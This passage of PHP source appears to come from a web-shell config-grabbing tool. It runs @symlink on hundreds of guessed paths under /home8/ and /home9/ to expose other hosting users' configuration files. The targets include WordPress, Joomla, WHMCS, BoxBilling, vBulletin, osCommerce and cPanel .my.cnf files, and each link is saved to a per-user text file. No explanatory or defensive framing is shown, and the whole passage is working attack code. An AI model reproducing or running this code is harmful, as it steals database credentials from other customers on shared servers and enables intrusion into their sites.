  2290. @symlink('/home8/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2291. @symlink('/home8/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2292. @symlink('/home8/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2293. @symlink('/home8/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2294. @symlink('/home8/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2295. @symlink('/home8/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2296. @symlink('/home8/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2297. @symlink('/home8/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2298. @symlink('/home8/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2299. @symlink('/home8/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2300. @symlink('/home8/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2301. @symlink('/home8/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2302. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2303. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2304. @symlink('/home8/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2305. @symlink('/home8/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2306. @symlink('/home8/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2307. @symlink('/home8/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2308. @symlink('/home8/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2309. @symlink('/home8/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2310. @symlink('/home8/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2311. @symlink('/home8/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2312. @symlink('/home8/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2313. @symlink('/home8/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2314. @symlink('/home8/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2315. @symlink('/home8/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2316. @symlink('/home8/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2317. @symlink('/home8/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2318. @symlink('/home8/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2319. @symlink('/home8/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2320. @symlink('/home8/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2321. @symlink('/home8/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2322. @symlink('/home8/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2323. @symlink('/home8/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2324. @symlink('/home8/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2325. @symlink('/home8/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2326. @symlink('/home8/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2327. @symlink('/home8/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2328. @symlink('/home8/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2329. @symlink('/home8/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2330. @symlink('/home8/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2331. @symlink('/home8/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2332. @symlink('/home8/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2333. @symlink('/home8/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2334. @symlink('/home8/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2335. @symlink('/home8/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2336. @symlink('/home8/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2337. @symlink('/home8/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2338. @symlink('/home8/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2339. @symlink('/home8/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2340. @symlink('/home8/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2341. @symlink('/home8/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2342. @symlink('/home8/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2343. @symlink('/home8/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2344. @symlink('/home8/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2345. @symlink('/home8/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2346. @symlink('/home8/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2347. @symlink('/home8/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2348. @symlink('/home8/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2349. @symlink('/home8/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2350. @symlink('/home8/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2351. @symlink('/home8/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2352. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2353. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2354. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2355. @symlink('/home8/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2356. @symlink('/home8/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2357. @symlink('/home8/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2358. @symlink('/home8/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2359. @symlink('/home8/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2360. @symlink('/home8/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2361. @symlink('/home8/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2362. @symlink('/home8/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2363. @symlink('/home8/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2364. @symlink('/home8/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2365. @symlink('/home8/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2366. @symlink('/home8/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2367. @symlink('/home8/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2368. @symlink('/home8/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2369. @symlink('/home8/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2370. @symlink('/home8/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2371. @symlink('/home8/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2372. @symlink('/home8/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2373. @symlink('/home8/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2374. @symlink('/home8/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2375. @symlink('/home8/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2376. @symlink('/home8/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2377. @symlink('/home8/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2378. @symlink('/home8/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2379. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2380. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2381. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2382. @symlink('/home8/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2383. @symlink('/home8/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2384. @symlink('/home8/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2385. @symlink('/home8/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2386. @symlink('/home8/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2387. @symlink('/home8/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2388. @symlink('/home8/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2389. @symlink('/home8/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2390. @symlink('/home8/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2391. @symlink('/home8/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2392. @symlink('/home8/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2393. @symlink('/home8/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2394. @symlink('/home8/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2395. @symlink('/home8/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2396. @symlink('/home8/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2397. @symlink('/home8/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2398. @symlink('/home8/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2399. @symlink('/home8/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2400. @symlink('/home8/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2401. @symlink('/home8/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2402. @symlink('/home8/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2403. @symlink('/home8/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2404. @symlink('/home8/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2405. @symlink('/home8/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2406. @symlink('/home8/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2407. @symlink('/home8/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2408. @symlink('/home8/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2409. @symlink('/home8/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2410. @symlink('/home8/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2411. @symlink('/home8/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2412. @symlink('/home8/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2413. @symlink('/home8/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2414. @symlink('/home8/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2415. @symlink('/home8/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2416. @symlink('/home8/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2417. @symlink('/home8/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2418. @symlink('/home8/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2419. @symlink('/home8/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2420. @symlink('/home8/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2421. @symlink('/home8/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2422. @symlink('/home8/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2423. @symlink('/home8/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2424. @symlink('/home8/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2425. @symlink('/home8/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2426. @symlink('/home8/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2427. @symlink('/home8/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2428. @symlink('/home8/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2429. @symlink('/home8/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2430. @symlink('/home8/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2431. @symlink('/home8/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2432. @symlink('/home8/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2433. @symlink('/home8/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2434. @symlink('/home8/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2435.  
  2436. //home 9
  2437.  
  2438. @symlink('/home9/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2439. @symlink('/home9/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2440. @symlink('/home9/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2441. @symlink('/home9/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2442. @symlink('/home9/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2443. @symlink('/home9/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2444. @symlink('/home9/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2445. @symlink('/home9/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2446. @symlink('/home9/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2447. @symlink('/home9/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2448. @symlink('/home9/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2449. @symlink('/home9/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2450. @symlink('/home9/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2451. @symlink('/home9/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2452. @symlink('/home9/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2453. @symlink('/home9/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2454. @symlink('/home9/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2455. @symlink('/home9/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2456. @symlink('/home9/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2457. @symlink('/home9/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2458. @symlink('/home9/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2459. @symlink('/home9/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2460. @symlink('/home9/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2461. @symlink('/home9/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2462. @symlink('/home9/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2463. @symlink('/home9/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2464. @symlink('/home9/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2465. @symlink('/home9/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2466. @symlink('/home9/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2467. @symlink('/home9/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2468. @symlink('/home9/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2469. @symlink('/home9/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2470. @symlink('/home9/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2471. @symlink('/home9/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2472. @symlink('/home9/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2473. @symlink('/home9/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2474. @symlink('/home9/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2475. @symlink('/home9/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2476. @symlink('/home9/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2477. @symlink('/home9/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2478. @symlink('/home9/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2479. @symlink('/home9/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2480. @symlink('/home9/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2481. @symlink('/home9/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2482. @symlink('/home9/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2483. @symlink('/home9/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2484. @symlink('/home9/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2485. @symlink('/home9/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2486. @symlink('/home9/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2487. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2488. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2489. @symlink('/home9/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2490. @symlink('/home9/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2491. @symlink('/home9/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2492. @symlink('/home9/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2493. @symlink('/home9/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2494. @symlink('/home9/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2495. @symlink('/home9/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2496. @symlink('/home9/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2497. @symlink('/home9/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2498. @symlink('/home9/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2499. @symlink('/home9/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2500. @symlink('/home9/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2501. @symlink('/home9/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2502. @symlink('/home9/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2503. @symlink('/home9/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2504. @symlink('/home9/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2505. @symlink('/home9/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2506. @symlink('/home9/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2507. @symlink('/home9/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2508. @symlink('/home9/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2509. @symlink('/home9/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2510. @symlink('/home9/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2511. @symlink('/home9/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2512. @symlink('/home9/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2513. @symlink('/home9/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2514. @symlink('/home9/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2515. @symlink('/home9/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2516. @symlink('/home9/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2517. @symlink('/home9/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2518. @symlink('/home9/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2519. @symlink('/home9/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2520. @symlink('/home9/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2521. @symlink('/home9/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2522. @symlink('/home9/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2523. @symlink('/home9/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2524. @symlink('/home9/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2525. @symlink('/home9/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2526. @symlink('/home9/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2527. @symlink('/home9/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2528. @symlink('/home9/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2529. @symlink('/home9/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2530. @symlink('/home9/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2531. @symlink('/home9/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2532. @symlink('/home9/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2533. @symlink('/home9/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2534. @symlink('/home9/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2535. @symlink('/home9/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2536. @symlink('/home9/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2537. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2538. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2539. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2540. @symlink('/home9/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2541. @symlink('/home9/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2542. @symlink('/home9/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2543. @symlink('/home9/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2544. @symlink('/home9/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2545. @symlink('/home9/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2546. @symlink('/home9/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2547. @symlink('/home9/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2548. @symlink('/home9/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2549. @symlink('/home9/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2550. @symlink('/home9/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2551. @symlink('/home9/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2552. @symlink('/home9/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2553. @symlink('/home9/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2554. @symlink('/home9/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2555. @symlink('/home9/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2556. @symlink('/home9/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2557. @symlink('/home9/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2558. @symlink('/home9/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2559. @symlink('/home9/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2560. @symlink('/home9/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2561. @symlink('/home9/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2562. @symlink('/home9/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2563. @symlink('/home9/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2564. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2565. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2566. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2567. @symlink('/home9/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2568. @symlink('/home9/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2569. @symlink('/home9/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2570. @symlink('/home9/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2571. @symlink('/home9/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2572. @symlink('/home9/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2573. @symlink('/home9/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2574. @symlink('/home9/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2575. @symlink('/home9/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2576. @symlink('/home9/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2577. @symlink('/home9/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2578. @symlink('/home9/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2579. @symlink('/home9/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2580. @symlink('/home9/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2581. @symlink('/home9/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2582. @symlink('/home9/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2583. @symlink('/home9/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2584. @symlink('/home9/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2585. @symlink('/home9/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2586. @symlink('/home9/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2587. @symlink('/home9/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2588. @symlink('/home9/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2589. @symlink('/home9/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2590. @symlink('/home9/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2591. @symlink('/home9/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2592. @symlink('/home9/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2593. @symlink('/home9/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2594. @symlink('/home9/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2595. @symlink('/home9/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
